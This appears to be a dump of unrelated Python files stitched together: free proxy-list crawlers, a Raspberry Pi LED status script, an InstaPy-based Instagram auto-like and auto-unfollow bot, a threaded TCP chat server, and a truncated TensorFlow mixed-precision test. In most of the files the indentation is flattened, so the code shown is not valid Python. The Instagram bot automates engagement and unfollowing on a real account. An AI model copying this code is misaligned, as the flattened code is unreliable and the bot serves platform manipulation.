class TheSpeedX_SOCKS_List(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(TheSpeedX_SOCKS_List, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/TheSpeedX/SOCKS-List/master/socks.txt'
self.protocol = 'socks5'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', text)
for r in rs:
r = r.strip()
r_ = r.split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol=self.protocol)
resultset.append(px)
return resultset
def run(self):
print('TheSpeedX_SOCKS_List')
if not self.check_alive():
return
texts = self.download()
objs = self.parse(texts)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class mclvren_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
        super(mclvren_proxy_list, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/mclvren/proxy-list/master/https.txt'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', text)
for r in rs:
r = r.strip()
r_ = r.split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol='https')
resultset.append(px)
return resultset
def run(self):
print('mclvren_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class a2u_free_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
        super(a2u_free_proxy_list, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/a2u/free-proxy-list/master/free-proxy-list.txt'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', text)
for r in rs:
r = r.strip()
r_ = r.split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol='https')
resultset.append(px)
return resultset
def run(self):
print('a2u_free_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class clarketm_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
        super(clarketm_proxy_list, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/clarketm/proxy-list/master/proxy-list.txt'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+\s.*', text)
for r in rs:
r = r.strip()
if '-S' in r:
proto = 'https'
else:
proto = 'http'
r_ = r.split(' ')[0].split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('clarketm_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class fate0_proxylist(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(fate0_proxylist, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/fate0/proxylist/master/proxy.list'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
lines = text.split('\n')
for line in lines:
line = line.strip()
if len(line) <= 0:
continue
p = json.loads(line)
px = ProxyInstance(ip=p['host'],
port=p['port'],
protocol=p['type'])
resultset.append(px)
return resultset
def run(self):
print('fate0_proxylist')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class ip_jiangxianli_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(ip_jiangxianli_com, self).__init__(*args, **kwargs)
self.base_url = 'http://ip.jiangxianli.com/?page={}'
def download(self, page):
response = requests.get(self.base_url.format(page), headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
urls = html.xpath('//button[contains(@class, "btn-copy")]/@data-url')
lines = urls
for line in lines:
line = line.strip()
if len(line) <= 0:
continue
px = ProxyInstance(ip=line.replace('//', '').split(':')[1],
port=line.split(':')[-1],
protocol=line.split(':')[0])
resultset.append(px)
return resultset
def run(self):
print('ip_jiangxianli_com')
if not self.check_alive():
return
for i in range(10):
text = self.download(i)
objs = self.parse(text)
if len(objs) <= 0:
break
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class ip3366_net(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(ip3366_net, self).__init__(*args, **kwargs)
self.base_url = [
'http://www.ip3366.net/free/?stype=1&page={}',
'http://www.ip3366.net/free/?stype=2&page={}'
]
def download(self, url, page):
response = requests.get(url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'gb2312'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
urls = html.xpath('//tbody//tr/td/text()')
ips = urls[0::7]
ports = urls[1::7]
protocols = urls[3::7]
for ip, port, proto in zip(ips, ports, protocols):
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('ip3366_net')
if not self.check_alive():
return
for url in self.base_url:
if not self.check_alive():
break
response = requests.get(url.format(1), headers=self.headers)
response.raise_for_status()
response.encoding = 'gb2312'
match_obj = re.search(r'page=(\d+)">尾页</a>', response.text)
if match_obj:
tot_page = int(match_obj.group(1))
for i in range(1, tot_page + 1):
if not self.check_alive():
break
text = self.download(url, i)
objs = self.parse(text)
if len(objs) <= 0:
break
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_goubanjia_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_goubanjia_com, self).__init__(*args, **kwargs)
self.base_url = 'http://www.goubanjia.com/'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
tds = html.xpath('//tbody//tr/td[@class="ip"]')
ips = []
ports = []
for td in tds:
cs = []
for c in td.getchildren():
if c.attrib.get('style') != 'display: none;' and c.attrib.get('style') != 'display:none;':
if c.text != None:
cs.append(c.text)
ips.append(''.join(cs[:-1]))
ports.append(cs[-1])
protos = html.xpath('//tbody/tr/td/a[contains(@title, "http")]/text()')
for ip, port, proto in zip(ips, ports, protos):
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('www_goubanjia_com')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class proxy_coderbusy_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(proxy_coderbusy_com, self).__init__(*args, **kwargs)
self.base_url = 'https://proxy.coderbusy.com'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
tds = html.xpath('//tbody//tr/td')
rs = []
for td in tds:
if td.getchildren():
for c in td.getchildren():
if c.tag == 'span':
rs.append(c.text.strip())
else:
if td.text != None:
rs.append(td.text.strip())
else:
rs.append('None')
ips = rs[0::9]
ports = rs[1::9]
httpses = rs[3::9]
for ip, port, https in zip(ips, ports, httpses):
if https == '√':
proto = 'https'
else:
proto = 'http'
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('proxy_coderbusy_com')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_kuaidaili_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_kuaidaili_com, self).__init__(*args, **kwargs)
self.base_url = [
'https://www.kuaidaili.com/free/inha/{}/',
'https://www.kuaidaili.com/free/intr/{}/'
]
def download(self, url, page):
response = requests.get(url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
ips = html.xpath('//tbody//td[@data-title="IP"]/text()')
ports = html.xpath('//tbody//td[@data-title="PORT"]/text()')
protos = html.xpath('//tbody//td[@data-title="类型"]/text()')
times = html.xpath('//tbody//td[@data-title="最后验证时间"]/text()')
for ip, port, proto, time in zip(ips, ports, protos, times):
if datetime.datetime.now().strftime('%Y-%m-%d') in time:
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('www_kuaidaili_com')
if not self.check_alive():
return
for url in self.base_url:
if not self.check_alive():
break
time.sleep(2)
response = requests.get(url.format(1), headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
match_obj = re.search(r'>(\d+)</a></li><li>页</li>', response.text)
if match_obj:
tot_page = int(match_obj.group(1))
for i in range(1, tot_page + 1):
if not self.check_alive():
break
time.sleep(1)
text = self.download(url, i)
objs = self.parse(text)
if len(objs) <= 0:
break
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_66ip_cn(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_66ip_cn, self).__init__(*args, **kwargs)
self.base_url = 'http://www.66ip.cn/areaindex_{}/1.html'
def download(self, page):
response = requests.get(self.base_url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'gb2312'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
nums = html.xpath('//p[@class="style7"]/span/text()')[0]
if nums == '0':
return resultset
tds = html.xpath('//table[@border="2px"]//td/text()')
ips = tds[0::5][1:]
ports = tds[1::5][1:]
for ip, port in zip(ips, ports):
px = ProxyInstance(ip=ip,
port=port,
protocol='http')
resultset.append(px)
return resultset
def run(self):
print('www_66ip_cn')
if not self.check_alive():
return
for num in range(1, 35):
if not self.check_alive():
break
text = self.download(num)
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_xicidaili_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_xicidaili_com, self).__init__(*args, **kwargs)
self.base_url = [
'https://www.xicidaili.com/nn/{}/',
'https://www.xicidaili.com/nt/{}/',
'https://www.xicidaili.com/wn/{}/',
'https://www.xicidaili.com/wt/{}/',
]
def download(self, url, page):
response = requests.get(url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
tds = html.xpath('//td/text()')
ips = tds[0::12]
ports = tds[1::12]
protos = tds[5::12]
for ip, port, proto in zip(ips, ports, protos):
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('www_xicidaili_com')
if not self.check_alive():
return
for url in self.base_url:
if not self.check_alive():
break
for i in range(1, 3):
if not self.check_alive():
break
time.sleep(1)
text = self.download(url, i)
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
def run():
crawlers = [
# hookzof_socks5_list(),
dxxzst_free_proxy_list(),
# TheSpeedX_SOCKS_List(),
mclvren_proxy_list(),
a2u_free_proxy_list(),
clarketm_proxy_list(),
fate0_proxylist(),
ip_jiangxianli_com(),
ip3366_net(),
www_goubanjia_com(),
proxy_coderbusy_com(),
www_kuaidaili_com(),
www_66ip_cn(),
www_xicidaili_com()
]
handlers = []
for c in crawlers:
handlers.append(threading.Thread(target=c.run))
for h in handlers:
try:
h.start()
except:
pass
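# Entry-point sketch (an assumption: in the full project this module may instead be
# imported and driven by a scheduler); running the file directly starts one thread
# per enabled crawler defined in run() above.
if __name__ == '__main__':
    run()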
|
ledStatus.py
|
#!/usr/bin/env python
import board
import requests
import argparse
import busio
import json
import time
import datetime
import adafruit_bme280
import threading
import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library
import subprocess
import logging
import sys
from systemd import journal
""" blink the LED according to the pattern"""
def blinkLED():
while True:
for status in pattern:
if status[0]==1:
GPIO.output(pinID, GPIO.HIGH) # Turn on
else:
GPIO.output(pinID, GPIO.LOW) # Turn off
time.sleep(status[1]) # Sleep
patterns = { "heartbeat" : [ [1, 0.02], [0, 7] ],
"error" : [ [1, 0.01], [0, 0.09] ],
"off" : [ [0, 5] ],
"on" : [ [1, 5] ]
}
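# The config file (default /home/pi/code/meteopi/meteopi.cfg) is JSON; a minimal
# sketch with only the keys read below, using illustrative values:
#   { "ledFile": "/home/pi/code/meteopi/ledstatus", "ledPIN": 17 }
# The file named by ledFile holds a single line naming one of the patterns above,
# e.g. "heartbeat".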
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Controls the LED status light.')
parser.add_argument('-t', '--cadence', type=int, default=5, help='Cadence in seconds.' )
parser.add_argument('-s', '--service', action="store_true", default=False, help='Specify this option if running as a service.' )
parser.add_argument('-c', '--config', type=str, default='/home/pi/code/meteopi/meteopi.cfg', help='Config file.' )
args = parser.parse_args()
configFile = open(args.config, 'rt')
config = json.loads(configFile.read())
ledFile = config['ledFile']
    GPIO.setwarnings(True) # Enable warnings about channels already in use
GPIO.setmode(GPIO.BCM) # Use BCM pin numbering
pinID = config['ledPIN']
cadence = args.cadence
GPIO.setup(pinID, GPIO.OUT, initial=GPIO.LOW) #
if args.service:
log = logging.getLogger('LEDstatus.service')
log.addHandler(journal.JournaldLogHandler())
log.setLevel(logging.INFO)
logLine = "Starting the LED status service with a cadence of %d seconds"%cadence
log.info(logLine)
try:
statusFile = open(ledFile, "rt")
line = statusFile.readline().strip()
statusFile.close()
except OSError as e:
print("No", ledFile, "file found.")
sys.exit()
try:
pattern = patterns[line]
t = threading.Thread(name='non-block', target=blinkLED)
t.start()
if args.service: log.info("Set LED to %s."%line)
currentPattern = pattern
except:
print("Status %s unrecognised"%line)
sys.exit()
while True:
time.sleep(cadence)
try:
statusFile = open(ledFile, "rt")
line = statusFile.readline().strip()
statusFile.close()
except OSError as e:
print("No", ledFile, "file found.")
try:
pattern = patterns[line]
if pattern==currentPattern: continue
else:
if args.service: log.info("Changed LED to %s."%line)
currentPattern = pattern
except:
print("Status %s unrecognised"%line)
|
IG_Autolike.py
|
import argparse
import yaml
import instaloader
import threading
import signal
import sys
from instapy import InstaPy
from instapy.util import web_address_navigator, get_relationship_counts
from instapy.like_util import get_links_from_feed, check_link, like_image, verify_liking
from selenium.common.exceptions import NoSuchElementException
from colorama import Style, Fore
from typing import List, Set
def Ig_Auto_Like(
maxLikes : int = 2000,
minLikes : int = 10,
maxFollowers : int = 10000,
minFollowing : int = 30,
minFollowers : int = 30,
whiteList : List[str] = [],
unfollowWhiteList : List[str] = []
):
# similar implementation as InstaPy.like_by_feed_generator()
# autolike instagram posts and manage followees if specified
session.login()
postsLiked : int = 0
numOfSearch : int = 0
linkNotFoundLoopError : int = 0
history : List[str] = []
alreadyLiked : int = 0
whiteListLike : int = 0
postByNonFollowees : int = 0
    breakOuterLoop : bool = False
    not_valid_users : int = 0
unfollowWhiteList = set(unfollowWhiteList)
while (postsLiked < NUM_POSTS):
if (breakOuterLoop):
break
try:
links = get_links_from_feed(
session.browser, NUM_POSTS, numOfSearch, session.logger
)
if len(links) > 0:
linkNotFoundLoopError = 0
if len(links) == 0:
linkNotFoundLoopError += 1
if linkNotFoundLoopError >= 10:
session.logger.warning(
"Loop error, 0 links"
" for 10 times consecutively, exit loop"
)
break
except NoSuchElementException:
session.logger.warning("Too few images, aborting")
session.aborting = True
return
numOfSearch += 1
for _, link in enumerate(links):
if postsLiked == NUM_POSTS:
breakOuterLoop = True
break
if link in history:
session.logger.info(
"This link has already been visited: {}".format(
link)
)
continue
else:
session.logger.info("New link found...")
history.append(link)
session.logger.info(
"[{} posts liked / {} amount]".format(
postsLiked, NUM_POSTS)
)
session.logger.info(link)
try:
(
inappropriate,
userName,
isVideo,
reason,
scope,
) = check_link(
session.browser,
link,
session.dont_like,
session.mandatory_words,
session.mandatory_language,
session.is_mandatory_character,
session.mandatory_character,
session.check_character_set,
session.ignore_if_contains,
session.logger,
)
except KeyError as e:
print(Fore.RED + "KEYERROR EXCEPTION: {}".format(e))
print(
"This is likely due to the current InstaPy library implementation. Try run `pip3 install -I https://github.com/schealex/InstaPy/zipball/develop` to install the fix. If you believe this is not the cause, comment out this exception handler." + Style.RESET_ALL
)
print("For more information, refer to https://github.com/timgrossmann/InstaPy/issues/6191 and https://github.com/timgrossmann/InstaPy/pull/6195")
breakOuterLoop = True
break
except Exception as ex:
session.logger.info("EXCEPTION ENCOUNTERED: {}, continuing...".format(ex))
continue
if whiteListLike < NUM_POSTS / 3 and userName in whiteList:
session.logger.info("{} is in the whitelist".format(userName))
likeState, msg = like_image(
session.browser,
userName,
session.blacklist,
session.logger,
session.logfolder,
postsLiked,
)
if likeState is True:
postsLiked += 1
whiteListLike += 1
session.jumps["consequent"]["likes"] = 0
else:
alreadyLiked += 1
continue
if (not CONTACTS_RETRIEVED):
print(Fore.RED + "THREADINFO | Auto Like Thread Waiting For Secure Contacts Set" + Style.RESET_ALL)
CONTACTS_EVENT.wait()
print(Fore.GREEN + "THREADINFO | Auto Like Thread Resuming" + Style.RESET_ALL)
if userName not in SELF_FOLLOWEES:
postByNonFollowees += 1
session.logger.warning("{} is not a followee, skipping...".format(userName))
if postByNonFollowees > NUM_POSTS / 8:
session.logger.info("{} posts by non followees in feed, aborting".format(postByNonFollowees))
breakOuterLoop = True
break
if userName not in SECURE_CONTACTS:
session.logger.info("User Name not in secure contacts, skipping...")
continue
if isVideo or inappropriate:
session.logger.info("Post is video or inappropriate, skipping...")
continue
session.liking_approved = verify_liking(
session.browser,
maxLikes,
minLikes,
session.logger,
)
usrFollowerCnt, usrFollowingCnt = get_relationship_counts(
session.browser, userName, session.logger
)
if (usrFollowerCnt > maxFollowers or usrFollowerCnt < minFollowers or usrFollowingCnt < minFollowing):
session.logger.info("User follower / following count out of range, skipping...")
continue
minLikes = max(minLikes, usrFollowerCnt / 30)
if session.liking_approved:
# validate user
validation, details = session.validate_user_call(userName)
if validation is not True:
session.logger.info(details)
not_valid_users += 1
continue
else:
web_address_navigator(session.browser, link)
# try to like
likeState, msg = like_image(
session.browser,
userName,
session.blacklist,
session.logger,
session.logfolder,
postsLiked,
)
if likeState is True:
postsLiked += 1
session.jumps["consequent"]["likes"] = 0
else:
alreadyLiked += 1
if alreadyLiked >= NUM_POSTS / 3:
session.logger.info("Too much already liked posts, terminating")
session.logger.info("Already liked {} / Amount {}".format(alreadyLiked, NUM_POSTS))
breakOuterLoop = True
break
session.logger.info("Finished Liking {} / {} Posts".format(postsLiked, NUM_POSTS))
if (ARGS.unfollow):
if (not CONTACTS_RETRIEVED):
print(Fore.RED + "THREADINFO | Auto Like Thread (UNFOLLOW) Waiting For Secure Contacts Set" + Style.RESET_ALL)
CONTACTS_EVENT.wait()
print(Fore.GREEN + "THREADINFO | Auto Like Thread (UNFOLLOW) Resuming" + Style.RESET_ALL)
Manage_Contacts(unfollowWhiteList)
def Get_Secure_Contacts():
# get list of users that are both follower and followee
global SECURE_CONTACTS
global CONTACTS_RETRIEVED
global SELF_FOLLOWERS
global SELF_FOLLOWEES
print(Fore.GREEN + "THREADINFO | Getting Secure Contacts" + Style.RESET_ALL)
loader = instaloader.Instaloader()
loader.login(USERNAME, PASSWORD)
profile = instaloader.Profile.from_username(loader.context, USERNAME)
followees = profile.get_followees()
followers = profile.get_followers()
SELF_FOLLOWERS = {f.username for f in followers}
SELF_FOLLOWEES = {f.username for f in followees}
SECURE_CONTACTS = SELF_FOLLOWEES.intersection(SELF_FOLLOWERS)
CONTACTS_RETRIEVED = True
CONTACTS_EVENT.set()
print(Fore.GREEN + "THREADINFO | Thread Finished Processing Secure Contacts" + Style.RESET_ALL)
def Manage_Contacts(unfollowWhiteList : Set[str]):
# unfollow nonfollowers followed by the user
toUnfollow : List[str] = []
nonfollower = SELF_FOLLOWEES.difference(SELF_FOLLOWERS)
for userName in nonfollower:
if userName not in unfollowWhiteList:
usrFollowerCnt, usrFollowingCnt = get_relationship_counts(
session.browser, userName, session.logger
)
if usrFollowerCnt < cfg["maxFollowers"]:
toUnfollow.append(userName)
session.logger.info("{} will be unfollowed".format(userName))
else:
session.logger.info("User {} in unfollow white list, skipping".format(userName))
session.unfollow_users(
amount = len(toUnfollow),
custom_list_enabled = True,
custom_list = toUnfollow,
custom_list_param = "all",
style = "RANDOM",
unfollow_after = None,
sleep_delay = 60
)
def Browser_Signal_Handler(sig, frame):
# Signal handler for keyboard interruption
session.logger.info("Process Terminated through SIGINT")
sys.exit(0)
def Main():
# Main thread
contactThread = threading.Thread(target = Get_Secure_Contacts)
autoLikeThread = threading.Thread(target = Ig_Auto_Like, kwargs = cfg)
contactThread.daemon = True
contactThread.start()
autoLikeThread.start()
contactThread.join()
autoLikeThread.join()
if __name__ == "__main__":
signal.signal(signal.SIGINT, Browser_Signal_Handler)
ARG_PARSER = argparse.ArgumentParser()
ARG_PARSER.add_argument("-u", "--username", help = "your ig username", required = True)
ARG_PARSER.add_argument("-p", "--password", help = "your ig password", required = True)
ARG_PARSER.add_argument("-a", "--amount", type = int, help = "posts to like", required = False, default = 0)
ARG_PARSER.add_argument("-f", "--unfollow", help = "whether to unfollow nonfollowers", action='store_true')
ARGS = ARG_PARSER.parse_args()
USERNAME = ARGS.username
PASSWORD = ARGS.password
NUM_POSTS = ARGS.amount
with open('Config.yaml', 'r') as cfgFile:
cfg = yaml.load(cfgFile, yaml.SafeLoader)
CONTACTS_RETRIEVED = False
CONTACTS_EVENT = threading.Event()
SECURE_CONTACTS : Set[str] = set()
SELF_FOLLOWERS : Set[str] = set()
SELF_FOLLOWEES : Set[str] = set()
session = InstaPy(username= USERNAME, password= PASSWORD)
Main()
session.browser.close()
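# Illustrative Config.yaml sketch (an assumption, not shipped with this script):
# the keys below are inferred from how `cfg` is consumed above (cfg["maxFollowers"]
# and the keyword arguments forwarded to Ig_Auto_Like); the values are placeholders.
#
#   maxLikes: 150
#   minLikes: 5
#   maxFollowers: 5000
#   minFollowers: 50
#   minFollowing: 50
#   whiteList:
#     - close_friend_1
#   unfollowWhiteList:
#     - close_friend_1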
|
server.py
|
#!/usr/bin/env python3
import socketserver
import sys
import threading
# usage: ./server.py [PORT] [HOST]
CLIENTS = []
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
# Class is instantiated once per connection to the server
def handle(self):
CLIENTS.append(self.request)
welcomeMsg = self.client_address[0] + ":" + str(self.client_address[1]) + " joined." + '\n'
sys.stdout.write(welcomeMsg)
sys.stdout.flush()
for cli in CLIENTS:
if cli is not self.request:
cli.sendall(welcomeMsg.encode())
while True:
data = self.request.recv(4096)
if data:
data = data.decode()
sendMsg = self.client_address[0] + ":" + str(self.client_address[1]) + "> " + data
sys.stdout.write(sendMsg)
sys.stdout.flush()
for cli in CLIENTS:
if cli is not self.request:
cli.sendall(sendMsg.encode())
else:
sendMsg = self.client_address[0] + ":" + str(self.client_address[1]) + " left." + '\n'
sys.stdout.write(sendMsg)
sys.stdout.flush()
CLIENTS.remove(self.request)
for cli in CLIENTS:
cli.sendall(sendMsg.encode())
break
if __name__ == "__main__":
if len(sys.argv) == 1:
HOST = ("localhost", 10000)
elif len(sys.argv) == 2:
HOST = ("localhost", int(sys.argv[1]))
else:
HOST = (sys.argv[2], int(sys.argv[1]))
server = ThreadedTCPServer(HOST, ThreadedTCPRequestHandler)
server.daemon_threads = True
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
sys.stdout.write("Server is up." + '\n')
sys.stdout.flush()
# Main loop: read operator input from stdin and broadcast it to all connected clients
while True:
try:
msg = sys.stdin.readline()
msg = "Server> " + msg
sys.stdout.write(msg)
sys.stdout.flush()
for client in CLIENTS:
client.sendall(msg.encode())
except KeyboardInterrupt:
break
server.shutdown()
server.server_close()
sys.stdout.write("Server is closed." + '\n')
sys.stdout.flush()
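# A minimal client sketch for this chat server (illustrative only and kept as a
# comment so it does not run as part of server.py; any TCP client, e.g.
# `nc localhost 10000`, works the same way):
#
#   import socket, sys, threading
#   sock = socket.create_connection(("localhost", 10000))
#
#   def reader():
#       while True:
#           data = sock.recv(4096)
#           if not data:
#               break
#           sys.stdout.write(data.decode())
#           sys.stdout.flush()
#
#   threading.Thread(target=reader, daemon=True).start()
#   for line in sys.stdin:
#       sock.sendall(line.encode())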
|
autocast_variable_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for AutoCastVariable."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import os
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.python.distribute import test_util
from keras.mixed_precision import autocast_variable
from keras.optimizer_v2 import gradient_descent as gradient_descent_v2
maybe_distribute = tf.__internal__.test.combinations.combine(distribution=[
tf.__internal__.distribute.combinations.default_strategy,
tf.__internal__.distribute.combinations.mirrored_strategy_with_cpu_1_and_2
])
def get_var(val, dtype, name=None):
return tf.compat.v1.Variable(val, use_resource=True, dtype=dtype, name=name)
@tf.__internal__.distribute.combinations.generate(tf.__internal__.test.combinations.combine(mode=['graph', 'eager']))
class AutoCastVariableTest(tf.test.TestCase, parameterized.TestCase):
def setUp(self):
test_util.set_logical_devices_to_at_least('CPU', 3)
super(AutoCastVariableTest, self).setUp()
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_read(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
# outside of auto cast scope.
self.assertEqual(x.dtype, tf.float32)
self.assertEqual(x.value().dtype, tf.float32)
self.assertEqual(x.read_value().dtype, tf.float32)
self.assertEqual(tf.identity(x).dtype, tf.float32)
# within auto cast scope of different dtype
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(x.dtype, tf.float32)
self.assertEqual(x.value().dtype, tf.float16)
self.assertEqual(x.read_value().dtype, tf.float16)
self.assertEqual(tf.identity(x).dtype, tf.float16)
# within auto cast scope of same dtype
with autocast_variable.enable_auto_cast_variables(tf.float32):
self.assertEqual(x.dtype, tf.float32)
self.assertEqual(x.value().dtype, tf.float32)
self.assertEqual(x.read_value().dtype, tf.float32)
self.assertEqual(tf.identity(x).dtype, tf.float32)
def test_sparse_reads(self):
x = get_var([1., 2], tf.float32)
# DistributedVariables do not support sparse_read or gather_nd, so this test
# runs without a distribution strategy.
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
self.assertEqual(x.sparse_read([0]).dtype, tf.float32)
self.assertEqual(x.gather_nd([0]).dtype, tf.float32)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(x.sparse_read([0]).dtype, tf.float16)
self.assertEqual(x.gather_nd([0]).dtype, tf.float16)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_read_nested_scopes(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(x.read_value().dtype, tf.float16)
with autocast_variable.enable_auto_cast_variables(tf.float32):
self.assertEqual(x.read_value().dtype, tf.float32)
self.assertEqual(x.read_value().dtype, tf.float16)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_dtype_is_not_string(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.assertEqual(x.dtype, tf.float32)
self.assertIsInstance(x.dtype, tf.DType)
self.assertEqual(x.true_dtype, tf.float32)
self.assertIsInstance(x.true_dtype, tf.DType)
dtype = tf.float16
with autocast_variable.enable_auto_cast_variables(dtype):
self.assertEqual(x.dtype, tf.float32)
self.assertIsInstance(x.dtype, tf.DType)
self.assertEqual(x.true_dtype, tf.float32)
self.assertIsInstance(x.true_dtype, tf.DType)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_method_delegations(self, distribution):
# Test AutoCastVariable correctly delegates Variable methods to the
# underlying variable.
with self.test_session(), distribution.scope():
for read_dtype in (tf.float32, tf.float16):
if tf.distribute.has_strategy():
# MirroredVariable.assign will (incorrectly) return a Mirrored value
# instead of a MirroredVariable. So we cannot properly wrap it in an
# AutoCastVariable.
evaluate = self.evaluate
else:
def evaluate(var):
self.assertIsInstance(var, autocast_variable.AutoCastVariable)
self.assertEqual(tf.identity(var).dtype, read_dtype) # pylint: disable=cell-var-from-loop
return self.evaluate(var)
x = get_var(7., tf.float32)
x = autocast_variable.create_autocast_variable(x)
with autocast_variable.enable_auto_cast_variables(read_dtype):
self.evaluate(x.initializer)
self.assertEqual(self.evaluate(x.value()), 7)
self.assertEqual(self.evaluate(x.read_value()), 7)
self.assertTrue(x.trainable)
self.assertEqual(x.synchronization, x._variable.synchronization)
self.assertEqual(x.aggregation, x._variable.aggregation)
self.assertEqual(self.evaluate(x.initialized_value()), 7)
